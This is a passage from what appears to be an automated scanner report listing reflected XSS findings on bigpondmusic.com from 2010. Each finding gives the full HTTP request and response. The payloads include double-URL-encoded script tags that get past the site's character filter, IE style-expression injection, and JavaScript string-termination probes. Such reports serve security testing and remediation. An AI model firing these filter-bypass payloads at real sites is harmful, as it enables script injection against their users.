X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 163568


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Get the best 100 albums from
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/70?2b21f"style="x:expression(alert(1))"d5b1a6bf075=1" />
...[SNIP]...

2.12. http://bigpondmusic.com/100/80 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b20ec'%3bc7b5b48db1a was submitted in the REST URL parameter 1. This input was echoed as b20ec';c7b5b48db1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100b20ec'%3bc7b5b48db1a/80 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87780


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lstrabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100b20ec';c7b5b48db1a';
   s.prop4 = '80';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'N
...[SNIP]...

2.13. http://bigpondmusic.com/100/80 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac9f7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee18865dec0f was submitted in the REST URL parameter 1. This input was echoed as ac9f7"><script>alert(1)</script>e18865dec0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100ac9f7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee18865dec0f/80 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88311


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100ac9f7"><script>alert(1)</script>e18865dec0f/80" />
...[SNIP]...

2.14. http://bigpondmusic.com/100/80 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8469a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec4c8c7be166 was submitted in the REST URL parameter 2. This input was echoed as 8469a"><script>alert(1)</script>c4c8c7be166 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100/808469a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec4c8c7be166 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:30:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87881


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/808469a"><script>alert(1)</script>c4c8c7be166" />
...[SNIP]...

2.15. http://bigpondmusic.com/100/80 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b562'%3bc2936948212 was submitted in the REST URL parameter 2. This input was echoed as 5b562';c2936948212 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100/805b562'%3bc2936948212 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87691


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
calhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100';
   s.prop4 = '805b562';c2936948212';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.16. http://bigpondmusic.com/100/80 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95fa6"style%3d"x%3aexpression(alert(1))"a3ab55095f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95fa6"style="x:expression(alert(1))"a3ab55095f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /100/80?95fa6"style%3d"x%3aexpression(alert(1))"a3ab55095f4=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 164679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Get the best 100 albums from
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/80?95fa6"style="x:expression(alert(1))"a3ab55095f4=1" />
...[SNIP]...

2.17. http://bigpondmusic.com/CombineScriptHandler.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /CombineScriptHandler.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e1c8'%3b5e1da53fc24 was submitted in the REST URL parameter 1. This input was echoed as 6e1c8';5e1da53fc24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CombineScriptHandler.aspx6e1c8'%3b5e1da53fc24 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87688


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
ost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'combinescripthandler.aspx6e1c8';5e1da53fc24';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.18. http://bigpondmusic.com/CombineScriptHandler.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /CombineScriptHandler.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 665d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed41d805a51f was submitted in the REST URL parameter 1. This input was echoed as 665d1"><script>alert(1)</script>d41d805a51f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /CombineScriptHandler.aspx665d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed41d805a51f HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87947


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/CombineScriptHandler.aspx665d1"><script>alert(1)</script>d41d805a51f" />
...[SNIP]...

2.19. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca3d'%3b95eca681716 was submitted in the REST URL parameter 1. This input was echoed as 4ca3d';95eca681716 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Vouchers4ca3d'%3b95eca681716/GiftBoxSelector HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87745


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'vouchers4ca3d';95eca681716';
   s.prop4 = 'giftboxselector';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   
...[SNIP]...

2.20. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47902%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e067d355d8b4 was submitted in the REST URL parameter 1. This input was echoed as 47902"><script>alert(1)</script>067d355d8b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Vouchers47902%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e067d355d8b4/GiftBoxSelector HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87945


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/Vouchers47902"><script>alert(1)</script>067d355d8b4/GiftBoxSelector" />
...[SNIP]...

2.21. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd4a2'%3b26b7643601d was submitted in the REST URL parameter 2. This input was echoed as bd4a2';26b7643601d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Vouchers/GiftBoxSelectorbd4a2'%3b26b7643601d HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87855


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
taging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'vouchers';
   s.prop4 = 'giftboxselectorbd4a2';26b7643601d';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.22. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc45bc0d49 was submitted in the REST URL parameter 2. This input was echoed as e6c7e"><script>alert(1)</script>1cc45bc0d49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Vouchers/GiftBoxSelectore6c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc45bc0d49 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/Vouchers/GiftBoxSelectore6c7e"><script>alert(1)</script>1cc45bc0d49" />
...[SNIP]...

2.23. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b383'%3b9a24d6a46d7 was submitted in the REST URL parameter 1. This input was echoed as 5b383';9a24d6a46d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album5b383'%3b9a24d6a46d7/angus-julia-stone/down-the-way HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
